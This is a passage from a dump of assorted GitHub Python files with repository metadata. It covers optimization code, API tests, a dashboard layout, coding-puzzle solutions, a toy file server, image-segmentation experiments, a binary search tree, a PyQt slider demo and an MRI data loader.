j or random.random() < self.crossover_rate:\n pos[j] = m_pos[j]\n else:\n pass # 更新しない\n\n # 優れている個体なら置き換える\n 
new_agent = self.problem.create(pos)\n self.count += 1\n if agent.getScore() < new_agent.getScore():\n self.agents[i] = new_agent\n\n","repo_name":"pocokhc/metaheuristics","sub_path":"codes/algorithms/DE.py","file_name":"DE.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"27632981361","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom indicoio import personas\nfrom .indico_text_base import TextTest\n\nclass PersonasTest(TextTest):\n\n def test_batch_personas(self):\n test_string = \"I love my friends!\"\n response = personas([test_string,test_string])\n self.assertTrue(isinstance(response, list))\n self.assertIsInstance(response[0][\"commander\"], float)\n self.assertEqual(response[0][\"commander\"], response[1][\"commander\"])\n\n def test_personas(self):\n test_string = \"I love my friends!\"\n response = personas(test_string)\n\n self.assertTrue(isinstance(response, dict))\n self.assertIsInstance(response[\"commander\"], float)\n","repo_name":"EliabWoldeyes/Qhacks2017","sub_path":"IndicoIo-Python/tests/text/test_personas.py","file_name":"test_personas.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12304075626","text":"from dash.base import BaseDashboardLayout, BaseDashboardPlaceholder\nfrom dash.base import layout_registry\n\n\nclass ExampleMainPlaceholder(BaseDashboardPlaceholder):\n uid = 'main' # Unique ID of the placeholder.\n cols = 6 # Number of columns in the placeholder.\n rows = 5 # Number of rows in the placeholder.\n cell_width = 150 # Width of a single cell in the placeholder.\n cell_height = 110 # Height of a single cell in the placeholder.\n \nclass ExampleShortcutsPlaceholder(BaseDashboardPlaceholder):\n uid = 'shortcuts' # UID of the placeholder.\n cols = 1 # Number of columns in the placeholder.\n rows = 10 # Number of rows in the placeholder.\n cell_width = 60 # Width of a single cell in the placeholder.\n cell_height = 55 # Height of a single cell in the placeholder.\n \nclass ExampleLayout(BaseDashboardLayout):\n uid = 'example' # Layout UID.\n name = 'Example' # Layout name.\n\n # View template. Master template used in view mode.\n view_template_name = 'example/view_layout.html'\n\n # Edit template. Master template used in edit mode.\n edit_template_name = 'example/edit_layout.html'\n\n # All placeholders listed. Note, that placeholders are rendered in the\n # order specified here.\n placeholders = [ExampleMainPlaceholder, ExampleShortcutsPlaceholder]\n\n # Cell units used in the entire layout. Allowed values are: 'px', 'pt',\n # 'em' or '%'. 
In the ``ExampleMainPlaceholder`` cell_width is set to 150.\n # It means that in this particular case its' actual width would be `150px`.\n cell_units = 'px'\n\n # Layout specific CSS.\n media_css = ('css/dash_layout_example.css',)\n\n # Layout specific JS.\n media_js = ('js/dash_layout_example.js',)\n\n# Registering the layout.\nlayout_registry.register(ExampleLayout)","repo_name":"PirateLearner/pi","sub_path":"dashboard/dash_layout.py","file_name":"dash_layout.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"23790413379","text":"'''\r\nGiven a mixed array of number and string representations of integers, add up the string integers and subtract this from the total of the non-string integers.\r\n\r\nReturn as a number.\r\n'''\r\n\r\ndef div_con(x):\r\n int_list = []\r\n int_total = 0\r\n nonint_list = []\r\n nonint_total = 0\r\n for item in x:\r\n if type(item) == int:\r\n int_list.append(item)\r\n elif type(item) == str:\r\n nonint_list.append(item)\r\n for y in int_list:\r\n int_total += y\r\n for z in nonint_list:\r\n nonint_total += int(z) \r\n return(int_total - nonint_total)","repo_name":"ttommytrinh/Codewars-Kata","sub_path":"Divide_And_Conquer.py","file_name":"Divide_And_Conquer.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11751199929","text":"class Solution(object):\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n is_vowel = []\n l_vowel = []\n res = ''\n for c in s:\n c_is_vowel = c in ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U']\n is_vowel.append(c_is_vowel)\n if c_is_vowel:\n l_vowel.append(c)\n l_vowel.reverse()\n vowel_count = 0\n for i, c in enumerate(s):\n if is_vowel[i]:\n res += l_vowel[vowel_count]\n vowel_count += 1\n else:\n res += c\n return res","repo_name":"fanzeng/Leetcode","sub_path":"345/345_Reverse_Vowels_of_a_String.py","file_name":"345_Reverse_Vowels_of_a_String.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39682688411","text":"# You need to implement the \"get\" and \"head\" functions.\nimport os\nclass FileReader:\n def __init__(self):\n pass\n\n def get(self, filepath, cookies=\"\"):\n \"\"\"\n Returns a binary string of the file contents, or None.\n \"\"\"\n # print(os.path.exists(filepath),filepath)\n if(os.path.exists(filepath)):\n if(os.path.isdir(filepath)):\n dir = f\"

 {filepath}
\"\n return dir.encode(\"utf-8\")\n else:\n f = open(filepath, \"rb\")\n file = f.read()\n f.close()\n return file\n else:\n return None\n\n def head(self, filepath, cookies=\"\"):\n \"\"\"\n Returns the size to be returned, or None.\n \"\"\"\n\n if (os.path.exists(filepath)):\n if (os.path.isdir(filepath)):#size of dir, would be the html string\n return len(self.get(filepath))\n else:#otherwise its a file \n return os.path.getsize(filepath)\n\n return None","repo_name":"bdinh117/simple-http-fileserver","sub_path":"file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39653084960","text":"import os.path\nimport sys\n\nimport cv2\nimport numpy as np\nimport pandas\nimport vigra\nimport segmfriends.io.zarr as zarr_utils\nimport nifty.graph.rag\nimport nifty.tools as ntools\n\nfrom segmUtils.io.export_images_from_zarr import export_images_from_zarr\nfrom segmUtils.preprocessing.preprocessing import convert_images_to_zarr_dataset, read_uint8_img, \\\n read_segmentation_from_file\nfrom segmfriends.io.images import write_segm_to_file\nfrom speedrun import process_speedrun_sys_argv\nfrom segmfriends.utils import check_dir_and_create\n\nfrom speedrun import BaseExperiment\nfrom segmfriends.utils.paths import get_vars_from_argv_and_pop\n\nfrom segmUtils.segmentation.cellpose.base_experiment import CellposeBaseExperiment\n\nfrom segmUtils.preprocessing import preprocessing as spacem_preproc\nfrom segmUtils.segmentation.cellpose import infer as cellpose_infer\nfrom segmUtils.postprocessing.convert_to_zarr import convert_segmentations_to_zarr, \\\n convert_multiple_cellpose_output_to_zarr\n\n\n\nclass MacrophagesExperiment(CellposeBaseExperiment):\n def compute_semantic_segm(self):\n # TODO: do it for every slice if too memory consuming...?\n zarr_path_predictions = self.zarr_path_predictions\n input_zarr_group_path = self.get(\"preprocessing/data_zarr_group\", ensure_exists=True)\n sem_segm_kwargs = self.get(\"compute_semantic_segm/compute_semantic_segm_kwargs\",\n ensure_exists=True)\n\n # Import raw data:\n mCherry_ch = zarr_utils.load_array_from_zarr_group(\n input_zarr_group_path,\n sem_segm_kwargs.get(\"red_channel_name\", \"mCherry\")\n )\n\n print(\"Computing semantic segmentation...\")\n for segm_data in sem_segm_kwargs.get(\"instance_segm_to_process\", []):\n GFP_segm = zarr_utils.load_array_from_zarr_group(\n zarr_path_predictions,\n segm_data[\"instance_segm_path\"]\n )\n GFP_segm, _, _ = vigra.analysis.relabelConsecutive(GFP_segm.astype(\"uint32\"))\n # Compute mCherry segmentation:\n mCherry_mask = mCherry_ch >= sem_segm_kwargs.get(\"red_ch_thresh\", 13)\n\n # # Get segmentation:\n # mCherry_segm = np.zeros_like(mCherry_mask, dtype=\"uint32\")\n # max_label = 0\n # for z in range(mCherry_mask.shape[0]):\n # mCherry_segm[z] = vigra.analysis.labelImage(mCherry_mask[z]) + max_label\n # max_label += mCherry_segm[z].max() + 1\n\n # TODO: check for nan values in the segmentation (and corner)\n rag = nifty.graph.rag.gridRag(GFP_segm.astype('uint32'))\n _, node_feat = nifty.graph.rag.accumulateMeanAndLength(rag, mCherry_mask.astype('float32'))\n # node_feat = nifty.graph.rag.accumulateNodeStandartFeatures(rag, mCherry_ch.astype('float32'), minVal=0., maxVal=255.)\n mean_mCherry_values = node_feat[:, [0]]\n assert np.isnan(mean_mCherry_values).sum() == 0, \"Something went wrong\"\n size_macrophages = node_feat[:, [1]]\n size_eaten_mCherry = 
mean_mCherry_values*size_macrophages\n # mean_mCherry_values[np.isnan(mean_mCherry_values)] = 0\n\n # Set segments with mCheery-mean > 2.0 as active:\n sem_mask = np.ones_like(mean_mCherry_values)\n sem_mask[size_eaten_mCherry >= sem_segm_kwargs.get(\"size_eaten_mCherry_thresh\", 10)] = 2.\n\n # mapped_feat = ntools.mapFeaturesToLabelArray(GFP_segm, mean_mCherry_values, ignore_label=0, fill_value=-1)[...,0]\n mapped_sem_segm = ntools.mapFeaturesToLabelArray(GFP_segm, sem_mask, ignore_label=0, fill_value=0)[\n ..., 0].astype(\n 'uint16')\n\n # Semantically label small cherry segments:\n mapped_sem_segm[np.logical_and(mCherry_mask, mapped_sem_segm == 0)] = 3\n\n # Delete small segments and get final segmentation:\n final_segm = np.where(GFP_segm == 0, mapped_sem_segm, GFP_segm + 5)\n max_label = 0\n for z in range(mapped_sem_segm.shape[0]):\n background_mask = final_segm[z] == 0\n final_segm[z] = vigra.analysis.labelImageWithBackground(final_segm[z].astype('uint32')) + max_label\n final_segm[z][background_mask] = 0 # TODO: not necessary anymore\n max_label += final_segm[z].max() + 1\n\n def get_size_map(label_image):\n node_sizes = np.bincount(label_image.flatten())\n return ntools.mapFeaturesToLabelArray(label_image, node_sizes[:, None], nb_threads=6).squeeze()\n\n size_map = get_size_map(final_segm)\n\n print(\"Size threshold: {}\".format(sem_segm_kwargs.get(\"size_threshold\", 25)))\n mask_small_segments = size_map < sem_segm_kwargs.get(\"size_threshold\", 25)\n mapped_sem_segm[mask_small_segments] = 0\n final_segm[mask_small_segments] = 0\n\n # Save segmentations to zarr file:\n zarr_utils.add_dataset_to_zarr_group(\n zarr_path_predictions,\n mapped_sem_segm,\n \"sem_segmentation\",\n add_array_dimensions=True\n )\n\n zarr_utils.add_dataset_to_zarr_group(\n zarr_path_predictions,\n final_segm,\n \"final_segmentation\",\n add_array_dimensions=True\n )\n\n print(\"Done processing semantic segmentations\")\n\n def export_results(self):\n \"\"\"\n For the moment this method is thought for inference. 
Generalize...?\n \"\"\"\n zarr_path_predictions = self.zarr_path_predictions\n input_zarr_group_path = self.get(\"preprocessing/data_zarr_group\", ensure_exists=True)\n export_images_from_zarr_kwargs = self.get(\"export_results/export_images_from_zarr_kwargs\", ensure_exists=True)\n csv_config_path = input_zarr_group_path.replace(\".zarr\", \".csv\")\n\n export_dir = os.path.join(self.experiment_directory, \"exported_results\")\n self.set(\"export_results/export_path\", export_dir)\n\n # Insert zarr path of the prediction file in the export parameters:\n assert \"datasets_to_export\" in export_images_from_zarr_kwargs\n datasets_to_export = export_images_from_zarr_kwargs.pop(\"datasets_to_export\")\n for idx in range(len(datasets_to_export)):\n datasets_to_export[idx][\"z_path\"] = zarr_path_predictions\n\n print(\"Exporting result images to original folder structure...\")\n\n\n # Export images in the original structure:\n export_images_from_zarr(export_dir,\n csv_config_path,\n datasets_to_export=datasets_to_export,\n delete_previous=True,\n **export_images_from_zarr_kwargs)\n\n def convert_sem_segm_to_csv(self):\n export_dir = os.path.join(self.experiment_directory, \"exported_results\")\n\n print(\"Converting semantic segmentation to csv format...\")\n df = convert_images_to_zarr_dataset(input_dir_path=export_dir,\n # ensure_all_channel_existance=True,\n rename_unique=False,\n extension=\".tif\",\n save_to_zarr=False,\n verbose=True,\n final_segm=\"_cell_segm\",\n sem_segm=\"_cell_type\"\n )\n\n for idx, image_data in df.iterrows():\n dir = image_data[\"Input dir\"]\n final_segm = read_segmentation_from_file(os.path.join(dir, image_data[\"final_segm\"]))\n sem_segm = read_segmentation_from_file(os.path.join(dir, image_data[\"sem_segm\"]))\n\n print(\"Max sem segmentation for {}: {}\".format(image_data[\"final_segm\"], sem_segm.max()))\n\n # Save semantic segmentation to csv:\n final_segm, _, _ = vigra.analysis.relabelConsecutive(final_segm.astype(\"uint32\"))\n\n rag = nifty.graph.rag.gridRag(final_segm.astype('uint32'))\n _, node_feat = nifty.graph.rag.accumulateMeanAndLength(rag, sem_segm.astype('float32'))\n node_semantic_segmentation = node_feat[:, 0].astype('uint32')\n\n # Write semantic data to csv:\n df = pandas.DataFrame({'cell_instance_ID': np.arange(1, node_semantic_segmentation.shape[0]),\n 'semantic_class': node_semantic_segmentation[1:]})\n df.to_csv(os.path.join(dir,image_data[\"sem_segm\"].replace(\".tif\", \".csv\")),index=False, sep=\";\")\n\n # Rewrite the new relabelled segmentation:\n write_segm_to_file(os.path.join(dir, image_data[\"final_segm\"]), final_segm)\n\n def test_enhance(self):\n in_dir = os.path.join(self.experiment_directory, \"cellpose_inputs/GFP_DAPI\")\n\n df = convert_images_to_zarr_dataset(input_dir_path=in_dir,\n rename_unique=False,\n extension=\".png\",\n save_to_zarr=False,\n verbose=True,\n cellpose_input=\"_0\",\n )\n\n from PIL import Image, ImageEnhance\n\n for idx, image_data in df.iterrows():\n dir = image_data[\"Input dir\"]\n cellpose_input = read_uint8_img(os.path.join(dir, image_data[\"cellpose_input\"]))\n pil_img = Image.fromarray(cellpose_input)\n enhancer = ImageEnhance.Brightness(pil_img)\n pil_img_out = enhancer.enhance(3)\n\n out_dir = os.path.join(dir, \"../bright\")\n check_dir_and_create(out_dir)\n pil_img_out.save(os.path.join(out_dir, image_data[\"cellpose_input\"]))\n # cv2.imwrite(os.path.join(out_dir, image_data[\"cellpose_input\"]), pil_img_out)\n break\n\n\n\nif __name__ == '__main__':\n source_path = 
os.path.dirname(os.path.realpath(__file__))\n sys.argv = process_speedrun_sys_argv(sys.argv, source_path, default_config_dir_path=\"./configs\",\n default_exp_dir_path=\"/scratch/bailoni/projects/cellpose_projects\")\n\n cls = MacrophagesExperiment\n cls().run()\n","repo_name":"abailoni/segmentation_spacem","sub_path":"experiments/veronika_proj/cellpose_infer.py","file_name":"cellpose_infer.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"75136227785","text":"class Solution:\n def findNumOfValidWords(self, words: List[str], puzzles: List[str]) -> List[int]:\n #create bitmasks for all the words and put them in counter to group similar words\n #create bitmasks for each puzzle and check if any of its submasks matches word\n #TC = O(n*avg(n)+m*2^avg(m))\n def bitmask(word):\n #func to find the bitmask of a word\n count=0\n for letter in word:\n count|=1<<(ord(letter)-ord('a'))\n return count\n \n word_map=Counter(bitmask(word) for word in words) #create bitmask counter\n ans=list()\n \n #iterate over all the puzzles\n for puzzle in puzzles:\n first=1<<(ord(puzzle[0])-ord('a')) #get first letter of puzzle in bit form\n count=word_map[first] #add words that have the first letter only\n mask=bitmask(puzzle[1:]) #bitmask of the remaining letters of the puzzle\n submask=mask\n #iterate over all the submasks\n while submask:\n count+=word_map[first|submask]\n submask=(submask-1)&mask #iterates through all the possible submasks\n ans.append(count)\n \n return ans\n \n ","repo_name":"bamblebam/competitive-programming","sub_path":"2021/11_November_21/9-11-21/numberofvalidwordsinpuzzle.py","file_name":"numberofvalidwordsinpuzzle.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"34542004440","text":"class No:\n def __init__(self, valor):\n self.valor = valor\n self.esquerda = None\n self.direita = None\n \n def mostra_no(self):\n print(self.valor)\n\n\nclass ArvoreBinariaBusca:\n def __init__(self):\n self.raiz = None\n self.ligacoes = []\n\n def inserir(self, valor):\n novo = No(valor)\n\n # se a árvore estiver vazia\n if self.raiz == None:\n self.raiz = novo\n else:\n atual = self.raiz\n\n while True:\n pai = atual\n\n if valor < atual.valor:\n atual = atual.esquerda\n if atual == None:\n pai.esquerda = novo\n self.ligacoes.append(f' {pai.valor} -> {novo.valor}')\n return\n else:\n atual = atual.direita\n if atual == None:\n pai.direita = novo\n self.ligacoes.append(f' {pai.valor} -> {novo.valor}')\n return\n\n def pesquisar(self, valor):\n atual = self.raiz\n\n while atual.valor != valor:\n if valor < atual.valor:\n atual = atual.esquerda\n else:\n atual = atual.direita\n if atual == None:\n return None\n\n return atual\n\n # Raiz, esquerda, direita\n def pre_ordem(self, no):\n if no != None:\n print(no.valor, end=' ')\n self.pre_ordem(no.esquerda)\n self.pre_ordem(no.direita)\n\n def em_ordem(self, no):\n if no != None:\n self.em_ordem(no.esquerda)\n print(no.valor, end=' ')\n self.em_ordem(no.direita)\n\n def pos_ordem(self, no):\n if no != None:\n self.pos_ordem(no.esquerda)\n self.pos_ordem(no.direita)\n print(no.valor, end=' ')\n\n def obter_sucessor(self, no):\n pai_sucessor = no\n sucessor = no\n atual = no.direita\n while atual != None:\n pai_sucessor = sucessor\n sucessor = atual\n atual = atual.esquerda\n if sucessor != no.direita:\n pai_sucessor.esquerda = sucessor.direita\n 
sucessor.direita = no.direita\n return sucessor\n\n def excluir(self, valor):\n if self.raiz == None:\n print('A árvore está vazia.')\n return\n \n atual = self.raiz\n pai = self.raiz\n e_esquerda = True\n while atual.valor != valor:\n pai = atual\n if valor < atual.valor:\n e_esquerda = True\n atual = atual.esquerda\n else:\n e_esquerda = False\n atual = atual.direita\n if atual == None:\n return False\n\n # Nó a ser apagado é uma folha\n if atual.esquerda == None and atual.direita == None:\n if atual == self.raiz:\n self.raiz = None\n elif e_esquerda:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n pai.esquerda = None\n else:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n pai.direita = None\n # Nó a ser apagado não possui filho a direita\n elif atual.direita == None:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.esquerda.valor}')\n if atual == self.raiz:\n self.raiz = atual.esquerda\n self.ligacoes.append(f' {self.raiz.valor} -> {atual.esquerda.valor}')\n elif e_esquerda == True:\n pai.esquerda = atual.esquerda\n self.ligacoes.append(f' {pai.valor} -> {atual.esquerda.valor}')\n else:\n pai.direita = atual.esquerda\n self.ligacoes.append(f' {pai.valor} -> {atual.esquerda.valor}')\n # Nó a ser apagado não possui filho a esquerda\n elif atual.esquerda == None:\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.direita.valor}')\n if atual == self.raiz:\n self.raiz = atual.direita\n self.ligacoes.append(f' {self.raiz.valor} -> {atual.direita.valor}')\n elif e_esquerda == True:\n pai.esquerda = atual.direita\n self.ligacoes.append(f' {pai.valor} -> {atual.direita.valor}')\n else:\n pai.direita = atual.direita\n self.ligacoes.append(f' {pai.valor} -> {atual.direita.valor}')\n # Nó posssui dois filhos\n else:\n sucessor = self.obter_sucessor(atual)\n self.ligacoes.remove(f' {pai.valor} -> {atual.valor}')\n self.ligacoes.remove(f' {atual.direita.valor} -> {sucessor.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.esquerda.valor}')\n self.ligacoes.remove(f' {atual.valor} -> {atual.direita.valor}')\n\n if atual == self.raiz:\n self.raiz == sucessor\n self.ligacoes.append(f' {self.raiz.valor} -> {sucessor.valor}')\n elif e_esquerda == True:\n self.ligacoes.append(f' {pai.valor} -> {sucessor.valor}')\n pai.esquerda = sucessor\n else:\n self.ligacoes.append(f' {pai.valor} -> {sucessor.valor}')\n pai.direita = sucessor\n\n self.ligacoes.append(f' {sucessor.valor} -> {atual.esquerda.valor}')\n self.ligacoes.append(f' {sucessor.valor} -> {atual.direita.valor}')\n\n sucessor.esquerda = atual.esquerda\n return True\n\n\narvore = ArvoreBinariaBusca()\narvore.inserir(53)\narvore.inserir(30)\narvore.inserir(14)\narvore.inserir(39)\narvore.inserir(9)\narvore.inserir(23)\narvore.inserir(34)\narvore.inserir(49)\narvore.inserir(72)\narvore.inserir(61)\narvore.inserir(84)\narvore.inserir(79)\n\nprint(arvore.raiz.esquerda.valor)\nprint(arvore.raiz.direita.valor)\n\n# string para gerar a visualização com o GraphViz.\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n if i == len(arvore.ligacoes)-1:\n print('}')\n\nprint(arvore.pesquisar(39))\nprint(arvore.pesquisar(84))\nprint(arvore.pesquisar(100))\n\narvore.pre_ordem(arvore.raiz)\nprint('')\narvore.em_ordem(arvore.raiz)\nprint('')\narvore.pos_ordem(arvore.raiz)\n\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n 
if i == len(arvore.ligacoes)-1:\n print('}')\n\narvore.excluir(9)\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n if i == len(arvore.ligacoes)-1:\n print('}')\n\narvore.excluir(84)\nfor i in range(len(arvore.ligacoes)):\n if i == 0:\n print('digraph g{')\n print(arvore.ligacoes[i])\n if i == len(arvore.ligacoes)-1:\n print('}')\n","repo_name":"AlissonRaphael/algorithm_and_data_structures","sub_path":"23_arvore_binaria.py","file_name":"23_arvore_binaria.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17349950640","text":"import scipy\nfrom glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nfrom scipy.ndimage import zoom\nmin_voxel_value = 0\n#max_voxel_value = 5653.5\nmax_voxel_standard_value = 1024\nclass DataLoader(object):\n def __init__(self, img_h_res, img_l_res):\n self.h_img_res = img_h_res\n self.l_img_res = img_l_res\n self.resource_pool = {}\n self.loop_i = 1\n\n def get_res_low_from_origin(self, img_h, with_mask=False):\n lr = []\n mask = []\n lr_large = []\n data = np.copy(img_h)\n x_l = self.l_img_res[0]\n x_h = self.h_img_res[0]\n step = x_h//x_l\n start = 0\n plane0 = data[0]\n for i in range(x_l):\n if start < data.shape[0]:\n lr.append(data[start])\n if with_mask:\n lr_large.append(data[start])\n mask.append(np.zeros_like(plane0))\n start += step\n for j in range(step - 1):\n if with_mask:\n mask.append(np.ones_like(plane0))\n lr_large.append(np.zeros_like(plane0))\n lr = np.array(lr)\n if with_mask:\n if len(mask) > x_h:\n mask = mask[:x_h]\n if len(lr_large) > x_h:\n lr_large = lr_large[:x_h]\n mask = np.array(mask)\n lr_large = np.array(lr_large)\n return lr, mask, lr_large\n return lr\n\n def get_file_count(self, dataset_path):\n paths = glob(dataset_path, recursive=True)\n return len(paths)\n\n def load_data(self, dataset_path, batch_size=1, is_testing=False, with_mask=False):\n paths = glob(dataset_path, recursive=True)\n batch_images = np.random.choice(paths, size=batch_size)\n imgs_hr = []\n imgs_lr = []\n imgs_mask = []\n imgs_lr_large = []\n imgs_info = []\n imgs_path = []\n imgs_shape = []\n for path in batch_images:\n if path not in self.resource_pool:\n info, h_img = self.imread(path)\n # prevent run out of memory\n if (len(self.resource_pool) < 500):\n self.resource_pool[path] = (info, np.copy(h_img))\n else:\n info, h_img = self.resource_pool[path]\n h_img = np.copy(h_img)\n\n if is_testing:\n h_img = test_preprocessing(h_img)\n h_img = self.normalize(h_img)\n h_img_stand = h_img\n l_img_stand = h_img\n # TODO test mask\n mask = None\n l_img_large = None\n else:\n x_raw, y_raw, z_raw = h_img.shape\n x, y, z,_ = self.h_img_res\n h_img_stand = zoom(h_img, (x/x_raw, y/y_raw, z/z_raw))\n h_img_stand = self.normalize(h_img_stand)\n if with_mask:\n l_img_stand, mask, l_img_large = self.get_res_low_from_origin(h_img_stand, with_mask)\n else:\n l_img_stand = self.get_res_low_from_origin(h_img_stand, with_mask)\n '''\n i = self.loop_i\n t = mask[:i]\n mask = mask[i:]\n mask = np.append(mask, t, axis=0)\n\n t = l_img_large[:i]\n l_img_large = l_img_large[i:]\n l_img_large = np.append(l_img_large, t, axis=0)\n\n self.loop_i += 1\n if self.loop_i > x:\n self.loop_i = 1\n '''\n h_img_stand = np.expand_dims(h_img_stand, axis=-1)\n l_img_stand = np.expand_dims(l_img_stand, axis=-1)\n if with_mask:\n mask = np.expand_dims(mask, axis=-1)\n l_img_large = 
np.expand_dims(l_img_large, axis=-1)\n imgs_mask.append(mask)\n imgs_lr_large.append(l_img_large)\n imgs_hr.append(h_img_stand)\n imgs_lr.append(l_img_stand)\n imgs_info.append(info)\n imgs_shape.append(h_img.shape)\n imgs_path.append(path)\n\n imgs_hr = np.array(imgs_hr)\n imgs_lr = np.array(imgs_lr)\n if with_mask:\n imgs_mask = np.array(imgs_mask)\n imgs_lr_large = np.array(imgs_lr_large)\n return imgs_hr, imgs_lr, imgs_mask, imgs_lr_large, imgs_info, imgs_shape, imgs_path\n return imgs_hr, imgs_lr, imgs_info, imgs_shape, imgs_path\n\n def normalize(self, img):\n max_value = np.max(img)\n average = max_value/2.0\n return np.array(img) / float(average) - 1.\n\n def unnormalize(self, img, max_value=None):\n if max_value is None:\n max_value = max_voxel_standard_value\n average = max_value/2.0\n return (img + 1) * average\n\n def imread(self, path):\n mri_image = nib.load(path)\n mri_image_data = mri_image.get_fdata()\n return mri_image, mri_image_data\n\ndef test_preprocessing(X):\n x,y,z,_ = X.shape\n X = np.reshape(X, (x,y,z))\n X = np.rot90(X, 1, axes=(0,2))\n X = np.rot90(X, 2, axes=(1,2))\n return X\n\ndef show_slices(slices, title=''):\n fig, axes = plt.subplots(len(slices), 1, figsize=(16, 16))\n for i,slice in enumerate(slices):\n axes[i].imshow(slice.T, cmap=\"gray\", origin=\"lower\")\n axes[i].set_title(title)\n return fig\n\ndef clear_samples():\n import os\n os.system(\"rm sample_niis/*\")\n os.system(\"rm sample_images/*\")\n\n","repo_name":"qinwang-ai/Brain","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"701024250","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nclass SliderDemo(QWidget):\n def __init__(self,parent=None):\n super(SliderDemo, self).__init__(parent)\n #设置标题与初始大小\n self.setWindowTitle('QSlider例子')\n self.resize(300,100)\n\n #垂直布局\n layout=QVBoxLayout()\n\n #创建标签,居中\n self.l1=QLabel('Hello PyQt5')\n self.l1.setAlignment(Qt.AlignCenter)\n layout.addWidget(self.l1)\n #创建水平方向滑动条\n self.s1=QSlider(Qt.Horizontal)\n ##设置最小值\n self.s1.setMinimum(10)\n #设置最大值\n self.s1.setMaximum(50)\n #步长\n self.s1.setSingleStep(3)\n #设置当前值\n self.s1.setValue(20)\n #刻度位置,刻度下方\n self.s1.setTickPosition(QSlider.TicksBelow)\n #设置刻度间距\n self.s1.setTickInterval(5)\n layout.addWidget(self.s1)\n #设置连接信号槽函数\n self.s1.valueChanged.connect(self.valuechange)\n\n self.setLayout(layout)\n\n def valuechange(self):\n #输出当前地刻度值,利用刻度值来调节字体大小\n print('current slider value=%s'%self.s1.value())\n size=self.s1.value()\n self.l1.setFont(QFont('Arial',size))\n\nif __name__ == '__main__':\n app=QApplication(sys.argv)\n demo=SliderDemo()\n demo.show()\n sys.exit(app.exec_())","repo_name":"yuting-demo-code/PyQt-code","sub_path":"slider bar.py","file_name":"slider bar.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"27541569784","text":"\n# CCC 2018 J3 - Are We There Yet\n\n# Sample Input\n# 3 10 12 5\n\n# Sample Output\n# 0 3 13 25 30\n# 3 0 10 22 27\n# 13 10 0 12 17\n# 25 22 12 0 5\n# 30 27 17 5 0\n\n# Answer:\ndist = [3, 10, 12, 5]\n\nfor i in range(-1, 4):\n currentDist = 0\n output = []\n for j in range(i, -1, -1):\n currentDist += dist[j]\n output.insert(0, currentDist)\n\n output.append(0)\n\n currentDist = 0\n for j in range(i + 1, 4, 1):\n currentDist += dist[j]\n 
output.append(currentDist)\n\n for num in output:\n print(num, end=\" \")\n print()\n\n\n\n# ------------------------------------------------------------\n\n# CCC 2019 J3 - Cold Compress\n\n# Input\n# 4\n# +++===!!!!\n# 777777......TTTTTTTTTTTT\n# (AABBC)\n# 3.1415555\n\n# Output\n# 3 + 3 = 4 !\n# 6 7 6 . 12 T\n# 1 ( 2 A 2 B 1 C 1 )\n# 1 3 1 . 1 1 1 4 1 1 4 5\n\n# Approach 1: Using hard cord computing\n# n = int(input())\n# strings = []\n# for i in range(n):\n# strings.append(input())\n#\n# for line in strings:\n# prev = \"\"\n# output = \"\"\n# counter = 1\n# for letter in line:\n# if prev == \"\":\n# prev = letter\n# continue\n# if letter != prev:\n# output += str(counter) + \" \" + str(prev) + \" \"\n# counter = 1\n# else:\n# counter += 1\n# prev = letter\n# output += str(counter) + \" \" + str(prev) + \" \"\n# print(output)\n\n# Approach 2: Using dictionary to count\n\n# for i in range(int(input())):\n# chars = {}\n# for j in input():\n# if j not in chars:\n# chars[j] = 1;\n# else:\n# chars[j] += 1;\n# for (key, value) in chars.items():\n# print(value, end=\" \")\n# print(key, end=\" \")\n# print(\"\\n\")\n\n\n\n","repo_name":"KennyCheung-Dev/PythonClassContent","sub_path":"Python1Algo/python1-19/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} 